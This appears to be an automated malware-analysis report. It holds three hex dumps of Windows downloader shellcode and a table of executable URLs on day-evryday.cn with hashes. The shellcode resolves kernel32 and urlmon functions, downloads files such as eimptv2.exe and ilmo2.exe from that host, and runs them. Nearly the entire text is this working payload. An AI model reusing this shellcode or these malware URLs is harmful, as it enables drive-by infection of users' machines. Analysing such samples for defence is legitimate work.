e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 65 69 6d 70 74 76 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /day-evryday.cn/ eimptv2.exe.http ://day-evryday.c n/click.php?r=.. |
0a 0a 0a 0a 0a 0a 0a 0a e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 69 6c 6d 6f 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00 | .............Vd. 0....@..p...@.^. U...E.R3....2.@. 8.u...Z]...U..QQ SVW`.].3..u....v <.Nx...Q.R.Q$R.q .N.u..q ...J.B`; U.u.3..73..E.... .u.+.OQ.....;.at ....E..^......3. ..._............ E.a.E._^[..U..Q. I...Ph.`...l...3 .RR.u....E..E... U......E.P.E.u.E .r.E.l.E.m.E.o.E .n.E...E.d.E.l.E .l.E.......Ph].. ...........t.j.j ..u..u.j.....u.@ ..3...W3..L$..|$ ...._..L$..9...t .@.8.u.+..U....d S.E.W3.P.E.k.E.e .E.r.E.n.E.e.E.l .E.3.E.2.E...E.d .E.l.E.l.]...... PhhC..........E. jDP.~....E.j.P.s .......E.P.E.PSS SSSS.u..E.D...S. ._...[..U..QQSVW jB.r.....3...Y.E .a.ex.E.e...~V.E .PV.Q...YP...... .YYt9.F.P.;..... .E.P.!.....YYt.W .....Y.D8.sP.E.. .X.E.PW.t...YYFF ;.|._^[..U..QSf` .2.....X8.t.@..@ .]...Bu.3....... 8.v.@3...t.@8.u. @....3..E..E.[.. 2.http://day-evr yday.cn/ilmo2.ex e.http://day-evr yday.cn/click.ph p?r=.. |
0a 0a 0a 0a 0a 0a 0a 0a e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 62 67 6e 70 78 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 64 61 79 2d 65 76 72 79 64 61 79 2e 63 6e 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 | .............Vd. 0....@..p...@.^. U...E.R3....2.@. 8.u...Z]...U..QQ SVW`.].3..u....v <.Nx...Q.R.Q$R.q .N.u..q ...J.B`; U.u.3..73..E.... .u.+.OQ.....;.at ....E..^......3. ..._............ E.a.E._^[..U..Q. I...Ph.`...l...3 .RR.u....E..E... U......E.P.E.u.E .r.E.l.E.m.E.o.E .n.E...E.d.E.l.E .l.E.......Ph].. ...........t.j.j ..u..u.j.....u.@ ..3...W3..L$..|$ ...._..L$..9...t .@.8.u.+..U....d S.E.W3.P.E.k.E.e .E.r.E.n.E.e.E.l .E.3.E.2.E...E.d .E.l.E.l.]...... PhhC..........E. jDP.~....E.j.P.s .......E.P.E.PSS SSSS.u..E.D...S. ._...[..U..QQSVW jB.r.....3...Y.E .a.ex.E.e...~V.E .PV.Q...YP...... .YYt9.F.P.;..... .E.P.!.....YYt.W .....Y.D8.sP.E.. .X.E.PW.t...YYFF ;.|._^[..U..QSf` .2.....X8.t.@..@ .]...Bu.3....... 8.v.@3...t.@8.u. @....3..E..E.[.. 2.http://day-evr yday.cn/bgnpx2.e xe.http://day-ev ryday.cn/click.p hp?r=. |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://day-evryday.cn/bgnpx2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 | |
| http://day-evryday.cn/cemru2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 | |
| http://day-evryday.cn/click.php?r= | N/A | N/A |
|
| http://day-evryday.cn/eimptv2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 | |
| http://day-evryday.cn/fgnqv7.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 | |
| http://day-evryday.cn/ilmo2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 | |
| http://day-evryday.cn/ilpq2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 | |
| http://day-evryday.cn/kowy2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 | |
| http://day-evryday.cn/sdgsg5.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | cc3a7323f8e3d8a432e9612a34d9c9d0 |